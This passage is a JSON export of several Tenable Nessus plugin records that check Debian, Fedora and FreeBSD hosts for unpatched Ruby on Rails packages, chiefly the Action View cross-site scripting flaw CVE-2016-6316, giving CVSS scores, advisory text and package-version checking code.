"MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3226", "CVE-2015-3227", "CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:rails", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3464.NASL", "href": "https://www.tenable.com/plugins/nessus/88499", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3464. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88499);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\n \"CVE-2015-3226\",\n \"CVE-2015-3227\",\n \"CVE-2015-7576\",\n \"CVE-2015-7577\",\n \"CVE-2015-7581\",\n \"CVE-2016-0751\",\n \"CVE-2016-0752\",\n \"CVE-2016-0753\"\n );\n script_xref(name:\"DSA\", value:\"3464\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Debian DSA-3464-1 : rails - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Multiple security issues have been discovered in the Ruby on Rails web\napplication development framework, which may result in denial of\nservice, cross-site scripting, information disclosure or bypass of\ninput validation.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/jessie/rails\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2016/dsa-3464\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the rails packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 2:4.1.8-1+deb8u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails Dynamic Render File Upload Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:rails\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"rails\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionmailer\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionpack\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionview\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activemodel\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activerecord\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activesupport\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activesupport-2.3\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-rails\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-railties\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-15T14:12:31", "description": "Andrew Carpenter of Critical Juncture discovered a cross-site scripting vulnerability affecting Action View in rails, a web application framework written in Ruby. Text declared as 'HTML safe' will not have quotes escaped when used as attribute values in tag helpers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-08-26T00:00:00", "type": "nessus", "title": "Debian DSA-3651-1 : rails - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:rails", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3651.NASL", "href": "https://www.tenable.com/plugins/nessus/93114", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3651. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93114);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6316\");\n script_xref(name:\"DSA\", value:\"3651\");\n\n script_name(english:\"Debian DSA-3651-1 : rails - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Andrew Carpenter of Critical Juncture discovered a cross-site\nscripting vulnerability affecting Action View in rails, a web\napplication framework written in Ruby. Text declared as 'HTML safe'\nwill not have quotes escaped when used as attribute values in tag\nhelpers.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=834155\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/rails\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3651\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the rails packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:4.1.8-1+deb8u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:rails\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"rails\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionmailer\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionpack\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionview\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activemodel\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activerecord\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activesupport\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activesupport-2.3\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-rails\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-railties\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-15T14:12:24", "description": "- Fix for CVE-2016-6316 (rhbz#1366480)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-08-29T00:00:00", "type": "nessus", "title": "Fedora 23 : rubygem-actionview (2016-ab8bf51cf3)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-AB8BF51CF3.NASL", "href": "https://www.tenable.com/plugins/nessus/93143", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-ab8bf51cf3.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93143);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6316\");\n script_xref(name:\"FEDORA\", value:\"2016-ab8bf51cf3\");\n\n script_name(english:\"Fedora 23 : rubygem-actionview (2016-ab8bf51cf3)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fix for CVE-2016-6316 (rhbz#1366480)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-ab8bf51cf3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-actionview package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"rubygem-actionview-4.2.3-6.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionview\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:40:07", "description": "Ruby Security team reports :\n\nThere is a possible XSS vulnerability in Action View. Text declared as 'HTML safe' will not have quotes escaped when used as attribute values in tag helpers. This vulnerability has been assigned the CVE identifier CVE-2016-6316.", "cvss3": {}, "published": "2016-10-17T00:00:00", "type": "nessus", "title": "FreeBSD : Rails 4 -- Possible XSS Vulnerability in Action View (43f1c867-654a-11e6-8286-00248c0c745d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:rubygem-actionview", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_43F1C867654A11E6828600248C0C745D.NASL", "href": "https://www.tenable.com/plugins/nessus/94081", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94081);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-6316\");\n\n script_name(english:\"FreeBSD : Rails 4 -- Possible XSS Vulnerability in Action View (43f1c867-654a-11e6-8286-00248c0c745d)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ruby Security team reports :\n\nThere is a possible XSS vulnerability in Action View. Text declared as\n'HTML safe' will not have quotes escaped when used as attribute values\nin tag helpers. This vulnerability has been assigned the CVE\nidentifier CVE-2016-6316.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://groups.google.com/forum/#!topic/ruby-security-ann/8B2iV2tPRSE\"\n );\n # https://vuxml.freebsd.org/freebsd/43f1c867-654a-11e6-8286-00248c0c745d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e4ba1a05\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionview>3.0.0<4.2.7.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-26T15:28:30", "description": "- Fix for CVE-2016-6316 (rhbz#1366480)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-08-29T00:00:00", "type": "nessus", "title": "Fedora 24 : rubygem-actionview (2016-0d9890f7b5)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-0D9890F7B5.NASL", "href": "https://www.tenable.com/plugins/nessus/93137", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-0d9890f7b5.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93137);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6316\");\n script_xref(name:\"FEDORA\", value:\"2016-0d9890f7b5\");\n\n script_name(english:\"Fedora 24 : rubygem-actionview (2016-0d9890f7b5)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fix for CVE-2016-6316 (rhbz#1366480)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-0d9890f7b5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-actionview package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"rubygem-actionview-4.2.5.2-3.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionview\");\n}\n", "cvss": {"score": 4.3, "vector": 